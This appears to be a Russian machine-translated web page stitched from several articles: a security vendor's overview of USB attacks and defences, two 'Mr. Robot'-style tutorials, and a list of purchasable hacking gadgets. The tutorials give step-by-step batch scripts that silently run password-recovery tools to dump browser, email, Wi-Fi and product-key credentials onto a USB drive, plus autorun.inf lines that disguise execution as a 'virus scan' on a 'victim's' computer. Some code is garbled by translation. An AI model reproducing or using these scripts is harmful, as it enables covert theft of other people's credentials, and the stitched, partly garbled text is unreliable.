Самая продвинутая атака через USB использует брешь в компьютерном программном обеспечении, о которой поставщик не знает, пока атака не будет обнаружена. Это называется атакой нулевого дня, потому что хакер действовал до того, как разработчик успел исправить уязвимость. Эти продвинутые кибератаки могут секретно взломать сеть и обеспечить элемент неожиданности.

Нарушения безопасности через USB

USB-атаки могут звучать так, как будто они ограничиваются личными устройствами, но на самом деле последствия могут быть намного больше.

Особенно хорошо известным примером атаки через USB-порт является Stuxnet, компьютерный червь, заразивший программное обеспечение на промышленных объектах в Иране, включая завод по обогащению урана. Вирус нацелился на производственные системы управления, созданные Siemens, скомпрометировал логические контроллеры системы, шпионил за целевыми системами и давал ложную обратную связь, что еще больше затрудняло обнаружение, и все началось с заражения USB-накопителя.

Не будь жертвой. Когда дело доходит до безопасности вашей организации, активная профилактика — лучшая стратегия. Позвоните нам по телефону , и мы поможем найти подход, который имеет смысл для ваших уникальных потребностей.

Правительство Соединенных Штатов также стало жертвой атак на флэш-накопители. В 2008 году зараженная флешка была подключена к американскому военному ноутбуку на Ближнем Востоке и стала «цифровым плацдармом» для иностранной разведки. Вредоносный код на накопителе незамеченным распространялся как в секретных, так и в несекретных системах, позволяя передавать данные на серверы под иностранным контролем.

В ходе одного из испытаний того, насколько хорошо может работать мошенничество через USB, Trustwave установил пять USB-накопителей, украшенных логотипами целевой компании, поблизости от здания организации. Два из пяти «потерянных и найденных» дисков были открыты в организации. Одно из открытий даже позволило исследователям взглянуть на программное обеспечение, используемое для контроля физической безопасности организации.

Компания в Гонконге даже разработала USB, способный убить компьютер. Собирая питание от USB-линии, он потребляет мощность, пока она не достигнет примерно 240 вольт, а затем разряжает эту энергию обратно в линии передачи данных при разрушительных скачках напряжения.Да, и USB Kill-накопитель доступен всего за 56 долларов — на случай, если вы думаете, что это то, чего кто-то может сделать, если он технически подкован и имеет глубокие карманы.

USB-приманка даже была замечена в массовой культуре, так как инструмент, известный как «Резиновая уточка», появился в шоу «Мистер Робот» в 2016 году. USB-ключу потребовалось всего несколько секунд, чтобы начать работу, используя HID-спуфинг для сбора информации ФБР. пароли.

А если вы хакер, почему бы и нет? Два лучших инструмента, которые может использовать злоумышленник, — это человеческое желание помочь другим и наше слепое доверие.Нетрудно представить, что вы могли бы сделать, если бы наткнулись на USB-ключ, оставленный копировальной машиной или кулером для воды. Вы, вероятно, подумаете, что кто-то в вашем офисе просто потерял его, и простым решением было бы подключить его к вашему собственному компьютеру, чтобы посмотреть, сможете ли вы найти идентифицирующую информацию.

Представьте, что там есть файл с надписью «Joe_Resume.pdf». Разве это не кажется безопасным и полезным файлом, который можно открыть, чтобы помочь вам вернуть устройство его законному владельцу? За исключением того, что, как вы теперь знаете, этот же файл может быть настроен для доставки вредоносного кода на ваш компьютер.

Большинство обычных пользователей не знают, как безопасно определить право собственности на USB-накопитель, поэтому проинформируйте сотрудников о риске обнаружения USB-накопителей и убедите их сдать любые найденные устройства в ИТ.

Информация о безопасности USB

Подумайте о том, сколько усилий было потрачено на то, чтобы запретить детям брать конфеты у незнакомцев. То же самое и с поощрением сотрудников не вставлять найденные USB-устройства в свои компьютеры. Одно исследование 2016 года сбросило 297 USB-накопителей в университетском городке.Из 98% обнаруженных устройств 45% были подключены к компьютерам.

USB-накопитель размером с большой палец становится все более обычным явлением, и это часть проблемы. Сегодня вы можете получить такой на съезде с логотипом компании и обещаниями рекламных материалов, которые вы сможете загрузить позже. Эти «карты памяти» маленькие, дешевые и могут хранить до 20 гигабайт данных.

«Чем более распространенными они стали, тем больше шансов, что они будут потеряны, украдены или использованы для распространения вредоносных программ.»- Norton

Эти удобные диски также легко потерять. Фактически, исследование 2008 года показало, что в карманах брюк людей в химчистках было найдено около 9000 карт памяти. Если информация на этих оставленных дисках не зашифрована и могут быть доступны не тем сторонам. Это само по себе представляет угрозу безопасности.

Итак, что делать?

  • Убедитесь, что сотрудники не хранят конфиденциальную информацию на USB-устройствах.
  • Если важные данные должны храниться на USB-устройстве, убедитесь, что оно защищено шифрованием или другой функцией безопасности, например аутентификацией по отпечатку пальца.
  • Поощряйте сотрудников отделять флэш-накопители, используемые дома, от используемых в офисе.
  • Изучите политики для сотрудников и обучите их соответствующим образом о том, что можно, а что нельзя подключить к сети компании.
  • Если сотрудники не заботятся о защите USB-портов своих компьютеров, вы можете даже подумать о том, чтобы физически заблокировать USB-порты на чувствительных компьютерах, чтобы избежать атак.
  • Кроме того, можно ограничить тип USB, авторизованного на компьютере — с помощью Windows или кода отключения USB — для предотвращения несанкционированного доступа.
  • И, конечно же, всегда разумно обновлять политики безопасности и исправления.

Важно обучать своих сотрудников, а также понимать ограничения ваших физических и сетевых протоколов безопасности. Готовы узнать, что это такое? Позвольте RedTeam Security Consulting проверить безопасность вашего объекта уже сегодня.

Щелкните, чтобы назначить бесплатную консультацию

A Краткая история USB-накопителей
  • Стандарт USB 1.0 был впервые представлен в 1995 году с целью разработки стандартизированного протокола подключения устройств.До USB компьютеры использовали множество различных портов и драйверов для подключения устройств и передачи данных.
  • Trek Technology выпустила первый коммерчески доступный USB-накопитель в 2000 году. На накопителе можно было хранить до 8 мегабайт данных.
  • К 2002 году было множество компаний, продающих эти флэш-накопители, и возникло множество патентных конфликтов.
  • В 2004 году стали широко доступны стандартные устройства USB 2.0 с накопителем, способным передавать данные со скоростью около 30 МБ / с, в отличие от USB 1 со скоростью 1 МБ / с.0 устройств.
  • Некоторые устройства USB 3.0 были выпущены в 2010 году и предлагали скорость передачи данных 4,8 гигабит в секунду.
  • USB-флеш-накопители, также известные как флэш-накопители, флеш-накопители, джамп-накопители или карты памяти, обычно выдерживают около миллиона перезаписей данных.

Как сделать хакерский USB-накопитель, как мистер Робот

Обычно я пишу об Интернет-маркетинге и делюсь с вами различными методами, которые можно использовать для развития вашего бизнеса, но сегодня я решил немного изменить его и создать больше «Забавный» пост, например, как сделать взломанный USB-накопитель, похожий на тот, который используется в Mr.Робот.

Для тех, кто не знает, мистер Робот — это американский телесериал о молодом компьютерном хакере, занимающемся антисоциальной политикой. Во втором сезоне, шестом эпизоде, один из персонажей вставляет USB-накопитель в компьютер, позволяя хакерам получить контроль над всей системой.

Взломанный USB-накопитель, который вы собираетесь сделать, быстро захватит каждый пароль, сохраненный на компьютере, и сохранит его на вашем USB-устройстве.
Сюда также входят ключи продуктов Microsoft и пароли Wi-Fi.

Обратите внимание, что я создаю это руководство не для того, чтобы вы могли причинить вред другим, я создаю его для того, чтобы вы могли увидеть, насколько легко кому-то украсть ваши пароли, если вы их сохраните.Взломанный USB также чрезвычайно полезен для ИТ-специалистов или для пользователей, которые, кажется, всегда забывают свои пароли.

Кроме того, это будет работать только на компьютерах под управлением Windows, и файлы на них будут помечены антивирусными сканерами как вредоносные.

Как сделать хакерский USB

Чтобы создать свой хакерский USB, вам нужно будет создать командный файл и загрузить несколько приложений, включенных в один пакет.
Пакетный файл (также известный как пакетный сценарий) позволяет автоматизировать задачи, и мы собираемся использовать его для запуска всех приложений и экспорта их данных в текстовые файлы.

    1. 1. Создайте новую папку и назовите ее Hacking USB .
    2. 2. Внутри папки создайте папку с именем Tools .
    3. 3. Перейдите в Nirsoft и загрузите пакет, который включает в себя все основные инструменты для восстановления паролей с поддержкой командной строки.
    4. 4. Распакуйте файлы в папку Tools с помощью такой программы, как 7-Zip.
    5. 5. Создайте текстовый документ в папке Tools , щелкнув правой кнопкой мыши пустое пространство, выбрав New и выбрав Text Document .
    6. 6. Переименуйте текстовый документ в Script.bat, чтобы превратить его в пакетный файл.
      Если вы не видите расширение .txt в конце вашего нового документа, вам необходимо отключить функцию Скрыть расширения файлов на вашем компьютере с помощью этого руководства.
    7. 7. Щелкните правой кнопкой мыши командный файл и выберите Изменить .
      Файл должен открыться в Блокноте.
      Я всегда рекомендую вам использовать Note ++ или Atom при кодировании любого типа, но для этого урока подойдет Блокнот.
    8. 8. Скопируйте и вставьте приведенный ниже код в Блокнот.
  :: www.PeterStavrou.com

@ эхо выключено
:: Echo делает окно командной строки пустым. Вы можете попробовать удалить это, чтобы увидеть, что произойдет.

журнал mkdir
:: Создает папку с именем log, только если папка еще не существует.

запустите BulletsPassView.exe / stext. \ log \ BulletsPassView-% computername% .txt
запустите ProduKey.exe / stext. \ log \ ProduKey-% computername% .txt
запустите ProtectedStorage.exe / stext. \ log \ ProtectedStorage-% computername%.текст
запустите RouterPassView.exe / stext. \ log \ RouterPassView-% computername% .txt
запустите WirelessKeyView.exe / stext. \ log \ WirelessKeyView-% computername% .txt
запустите ChromePass.exe / stext. \ log \ ChromePass-% computername% .txt
запустите Dialupass.exe / stext. \ log \ Dialupass-% computername% .txt
запустите iepv.exe / stext. \ log \ iepv-% computername% .txt
запустите mailpv.exe / stext. \ log \ mailpv-% computername% .txt
запустите mspass.exe / stext. \ log \ mspass-% computername% .txt
запустите netpass.exe / stext. \ log \ netpass-% computername% .txt
запустите PasswordFox.exe / stext. \ log \ PasswordFox-% имя_компьютера% .txt
запустите WebBrowserPassView.exe / stext. \ log \ WebBrowserPassView-% computername% .txt
:: Вышеупомянутое запускает каждое приложение и экспортирует результаты в виде текстовых документов с использованием соглашения об именах ApplicationName-ComputerName  
  1. 9. Сохраните Блокнот.

Теперь, если вы запустите файл Script.bat, вы заметите, что была создана папка с именем log со списком паролей.

Дополнительные шаги (необязательно)

Если вы похожи на меня и любите содержать все в порядке и порядке, то рекомендуются следующие шаги.

1. Щелкните правой кнопкой мыши файл Script.bat и выберите Создать ярлык .

2. Переместите созданный вами ярлык из папки Tools в папку Hacking USB.

3. Скопируйте и вставьте файлы на USB-устройство.

Заключение

Как видите, кому-то очень легко создать взломанный USB-накопитель для кражи всех ваших паролей, поэтому вам следует быть очень осторожными при сохранении конфиденциальных учетных данных, таких как банковские реквизиты, на вашем компьютере.Несмотря на то, что многие вредоносные программы достаточно умны, чтобы обходить антивирусные сканеры, все же рекомендуется установить одну из них.

Если вы ИТ-специалист, этот USB-порт определенно будет очень удобен.
Кроме того, если вы тот, кто все время забывает свои пароли, это отличный способ их найти.

Вам нравится телешоу Мистер Робот?

Как взломать любую систему с помощью USB

Мы все видели фильмы о взломах, в которых хакеры подключают USB к системе, и она автоматически взламывается.Что ж, это не фантастика. Вы не поверите, но сделать это довольно просто. И, что самое главное, вам не требуется ни продвинутого платного программного обеспечения, ни каких-либо модных вещей.

Вам даже не понадобится ничего, кроме блокнота с бесплатными программами и USB-накопителя. Вдобавок к этому сегодня мы изучаем не один, а два разных способа взлома с помощью USB-накопителя.

Итак, без лишних слов, приступим.

Требования :
  • Подключение к Интернету
  • Ручка или USB-накопитель
  • Терпение

1) USB-стилер

USBStealer USB-хакер — это Windows-хакер . Инструмент, который поможет вам взломать и извлечь пароль из приложений на базе Windows, таких как пароль Chrome, пароль Firefox, NetPassword, пароли администратора компьютера с Windows, а также пароли Wi-Fi, хранящиеся в этой системе.

Вы можете загрузить это программное обеспечение с официальной страницы GitHub проекта .

Примечание: для того, чтобы этот хак работал, нам нужна система Windows. В конце концов, Windows наиболее уязвима для вирусов. Для этого сценария рекомендуется доступ администратора для отображения всех данных. Это не обязательно, но для большинства функций требуются права администратора. Запустите этот инструмент Password Hacker и взломайте пароль для выполнения операции пентестинга.

Шаг 1. Загрузите USB-скрипт взлома. ссылка на проект Github.

Шаг 2: Извлеките файлы

Извлеките файлы на USB-накопитель, как показано.

Шаг 3: Запустите сценарий USB Hacking

Подключите USB к системе жертвы. Теперь щелкните lasagna.exe.

Шаг 4: Наслаждайтесь добычей

После запуска файла все пароли в системе будут сохранены в скрытой папке с названной добычей.

Шаг 5: Отсоедините

Отсоедините Pendrive от системы.

Вы можете получить доступ ко всем взломанным паролям с помощью блокнота, как показано ниже на вашем флеш-накопителе в папке с добычей. Взлом таких сайтов, как Facebook и Instagram, ничего не стоит для этого программного обеспечения.

Он в значительной степени взламывает все пароли в системе Windows. Теперь вы знаете, как хакеры взламывают ПК с Windows только через USB.

Но что, если вы хотите еще больше автоматизировать атаку.

Ну почему бы и нет.

Шаг 1: Новый текстовый документ

Создайте текстовый документ внутри USB , щелкнув правой кнопкой мыши по пустому пространству, выбрав New, и выбрав T ext Document .

Шаг 2. Скрипт автозапуска

Добавьте следующие строки кода в текстовый файл и сохраните его как autorun.inf

[autorun] open = bitch.bat ДЕЙСТВИЕ = Выполнить сканирование на вирусы

Если вы не видите расширение .txt файла в конце вашего нового файла документа, то вам необходимо вручную отключить функцию Windows Скрыть расширения файлов в системе. Вы можете найти его в разделе просмотра, как показано ниже.

Перейти к моему компьютеру (этот компьютер)>

Просмотр>

Расширения имени файла

Шаг 3: всплывающее окно автозапуска

Теперь, когда вы вставляете флеш-накопитель / USB в систему Windows, скрипт автозапуска запустится, и появится всплывающее окно, предлагающее жертве (или вам) выполнить проверку на вирусы.

Шаг 4. Выполните сканирование на вирусы (Скрытно запустите сценарий)

Во всплывающем окне выберите первый вариант — , чтобы выполнить сканирование на вирусы .

Шаг 5: Наслаждайтесь автоматической добычей

Теперь все сценарии взлома паролей будут незаметно выполняться в фоновом режиме и, как и раньше, все пароли будут сохранены в папке добычи в виде файла TXT .

Поздравляю, вы успешно взломали компьютер с Windows с помощью USB-накопителя, как это делает Мистер Робот в знаменитом телешоу.

Теперь о втором методе

2) Как сделать взлом USB

Чтобы создать свой взломанный USB, вам нужно будет создать командный файл, который будет автоматически запускать все необходимое нам программное обеспечение

Пакетный файл ( также известный как пакетный сценарий) позволяет автоматизировать задачи на компьютерах с Windows. Мы собираемся использовать сценарий того же типа, чтобы запустить все наши сценарии взлома и экспортировать данные их паролей в текстовые файлы.

Перейдите на официальный сайт Nirsoft и загрузите все пакеты, которые включают все основные инструменты для восстановления паролей с поддержкой командной строки.Это инструменты взлома, которые мы собираемся использовать для извлечения паролей. Если спросят:

Имя пользователя: скачать

пароль: nirsoft123!

Шаг 2: Извлечение файлов

Извлеките файлы в любую папку с помощью такой программы, как 7-Zip или WinRAR. Если спросят:

пароль: nirsoft123!

Шаг 3: Скопируйте файлы .exe на USB

Загрузите все инструменты, которые вы загрузили на первом шаге, распакуйте их в любую папку.Теперь скопируйте только исполняемые файлы (файлы .exe) на USB-накопитель.

т.е. скопируйте файлы — mspass.exe , mailpv.exe , iepv.exe , pspv.exe, и passwordfox.exe на USB-накопитель.

Шаг 4: сценарий автозапуска

Теперь создайте текстовый документ и добавьте в сценарий следующий код:

[autorun] open = launch.bat ДЕЙСТВИЕ = Выполнить сканирование на вирусы

Сохраните в блокноте и переименуйте его в из New Text Document.txt с по autorun.inf . Примечание. Убедитесь, что файл autorun.inf должен находиться в корневой папке USB. Ни в какой другой папке.

Шаг 5: USB HACKING SCRIPT

Создайте еще один текстовый файл с помощью блокнота и напишите следующие строки кода в скрипте:

start mspass.exe / stext mspass.txt start mailpv.exe / stext mailpv .txt запустить iepv.exe / stext iepv.txt запустить pspv.exe / stext pspv.txt start passwordfox.exe / stext passwordfox.txt

Сохраните текстовый файл блокнота и переименуйте его из New Text Document.txt в launch.bat . Прямо как автозапуск. inf убедитесь, что файл находится в корневой папке USB-накопителя.

Теперь ваш руткит USB Hacking готов взломать ваших жертв.

Просто выполните следующие действия:

Шаг 1: Теперь, когда вы вставляете флешку / USB в систему Windows, скрипт автозапуска выполнится, и появится окно с запросом жертвы (или вас) для проверки на вирусы.

Шаг 2: Во всплывающем окне автозапуска выберите первый вариант с надписью « Выполнить сканирование на вирусы ».

Шаг 3: Теперь все инструменты для взлома паролей будут незаметно запускаться в фоновом режиме. Вряд ли это займет секунду. Взломанные пароли сохраняются в. TXT файлов.

Шаг 4: Извлеките фломастер, и вы увидите все взломанные пароли в файле. TXT файлов

Поздравляем, вы узнали, как взломать любую систему Windows с помощью USB-накопителя.

Как защитить себя от этого взлома

Защитить себя сложно, так как взломать очень легко, но при этом очень мощно, но вы можете предпринять следующие меры, чтобы предотвратить взлом.

  • Не позволяйте никому использовать вашу личную систему.
  • Отключить автозапуск
  • Установите хороший антивирус.
  • Не сохранять пароль в браузерах.

Часто задаваемые вопросы:

Q1. Этот взлом легален.?

Нет, этот взлом никоим образом не является законным. Эта статья предназначена только для тестирования и обучения. Пожалуйста, используйте эти инструменты только в образовательных целях.

2 кв. На windows 10 работает?

Да, он работает в Windows 10. Автозапуск может работать или не работать в зависимости от настроек Windows, а также от версии.

10 инструментов для взлома, которые, по вашему мнению, были бы незаконными, но продаются в Интернете

Спасибо за показы вроде Mr.Робот , хакерство переживает величайший культурный момент за более чем десятилетие, и вам может быть любопытно узнать, что такое весь этот хакерский бизнес.

Хотя вы можете подумать, что инструменты, которые используют хакеры, полностью незаконны, большинство из них на самом деле являются повседневными инструментами законных профессионалов в области безопасности — просто, вы знаете, они не используются по назначению. Считаете ли вы, что производители этих продуктов подмигивали, когда говорили «использование по назначению», — это полностью ваш вопрос.

Это означает, что вам доступно множество интригующих хакерских штуковин и устройств.Но будьте осторожны: дешево стать хакером непросто.

Amazon

10. Keyllama 4MB USB Value Keylogger

Кейлоггер делает именно то, что предполагает его название: регистрирует каждый последний бит активности клавиатуры, которую он отслеживает. Этот устанавливается совершенно незаметно — никакое программное обеспечение не может его обнаружить — и может записывать до года набора текста. Предполагаемый фаворит некоторых предприимчивых бывших студентов Университета Айовы. (55,50 долларов США, Amazon)

Amazon

9.HackRF One

Невероятно мощный радиопередатчик и приемник, способный на всевозможные манипуляции в стиле фанк. Его даже можно использовать для отпирания дверей машины… по крайней мере, нам так говорят.

(317,95 долларов США, Amazon)

Amazon

8. Tomssmartcam Mini Hidden Camera USB

Скрытые шпионские камеры в моде, и эта, пожалуй, самая удобная для хакеров, как это выглядит — и это — обычная флешка. Он может записывать где угодно до двух часов, а затем сразу вставлять в компьютер видео, готовое к просмотру.Он также работает как обычный USB-накопитель на случай, если кому-то понадобится передать вам какие-то электронные таблицы или что-то в этом роде. (39,99 долларов США, Amazon)

Amazon

7. EyeSpy Digital Spy Recorder

Он буквально называет себя ошибкой. Достаточно одного щелчка переключателя, который может записывать в течение 140 часов, записывая только тогда, когда люди на самом деле разговаривают. (119 долларов США, Amazon)

Amazon

6. Сетевой адаптер Alfa

Если вы когда-нибудь хотели взломать сеть Wi-Fi, это один из многих адаптеров, которые настраиваются для мониторинга других сетей. и пассивная отправка данных.Не то чтобы вам стоило взломать сеть Wi-Fi. Вы не должны хотеть, чтобы выполнял какие-либо действия из этого списка. Просто чтобы нам было понятно. (32,99 долл. США, Amazon)

Amazon

5. Proxmark 3 Kit

Это устройство может считывать и копировать RFID-метки, которые используются повсюду как способ отслеживания предметов с использованием определенной электромагнитной частоты меток. Скопируйте эту подпись, и вы получите доступ ко всему, к чему имеет доступ этот тег.

(325 долларов США, Amazon)

Amazon

4.Ubertooth One

Он может отслеживать и отслеживать любые близлежащие устройства Bluetooth. Это было бы еще более полезно несколько лет назад, когда казалось, что блютуз — это исключительно сфера громких бизнес-придурков, за которыми нужно пристально следить, но все еще очень круто.

(127,95 долларов США, Amazon)

Amazon

3. Magspoof

С помощью этого устройства вы можете копировать и хранить все свои кредитные карты и все остальное с магнитной полосой на одном устройстве, а затем передавать нужные данные карты по беспроводной сети без необходимости иметь с собой сам пластик.На веб-сайте Magspoof подчеркивается, что было бы невозможно сделать что-либо из этого с чьей-либо кредитной картой , просто для записи, но, вероятно, лучше не делать ставки против человеческого предприятия.

(75 долларов США, Amazon)

Amazon

2. Миссия Тьма Фарадея Сумка

Если от простого чтения этого списка у вас параноик, вы теперь попали в какой-то список других , ну 1) как вы думаете, что мы чувствуем после того, как написали его, и 2) вы можете рассмотреть сумку Фарадея, подкладка которой предназначена для блокирования всех сигналов от попадания в электронные устройства внутри нее.Этот достаточно большой для ноутбука, хотя более дешевые модели предназначены только для телефонов.

Ваш комментарий будет первым

    Добавить комментарий

    Ваш адрес email не будет опубликован. Обязательные поля помечены *